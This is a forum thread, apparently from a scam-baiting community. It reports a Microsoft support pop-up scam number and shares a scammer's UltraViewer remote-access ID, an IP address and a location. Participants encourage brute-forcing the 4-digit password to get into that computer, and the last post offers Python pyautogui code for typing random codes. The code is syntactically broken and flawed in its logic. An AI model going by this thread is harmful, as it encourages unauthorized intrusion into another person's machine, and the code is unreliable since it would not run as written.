Microsoft Text Support

Scam Number: 860-310-5508
Domain Used:
Extra Info: Pop up scam

2 Likes

Welcome to our community, @Dinotronz1. I have the Ultraviewer ID for one of the scammers computers. The ID is 52289713. You need to brute force the 11000 combos of the 4-digit password. Number still works though.

1 Like

how can i bruteforce it?

Location: Guwahati, Assam (eastern India)
IP 10.103.53.37
Pop-up call and PayPal in one audio
http://chirb.it/BtOFw9

2 Likes

bruteforce is literally try any combination until it works.
there might be tools that help you do this faster but it really is just try every single combination until one works

Welcome to the community @Dinotronz1 :tada:

1 Like

This python code will help

#Python code for spam
import pyautogui
import time
import random
import string

while True():
     passcode = random.choice(string.digits) for i in range(4)time.sleep(5)
     pyautogui.write(passcode)
     pyautogui.press(enter)
     time.sleep(2)
#it should press two times, if the password is incorrect occurs. after you got in, hit ctrl-c.
     pyautogui.press(enter)
     time.sleep(2)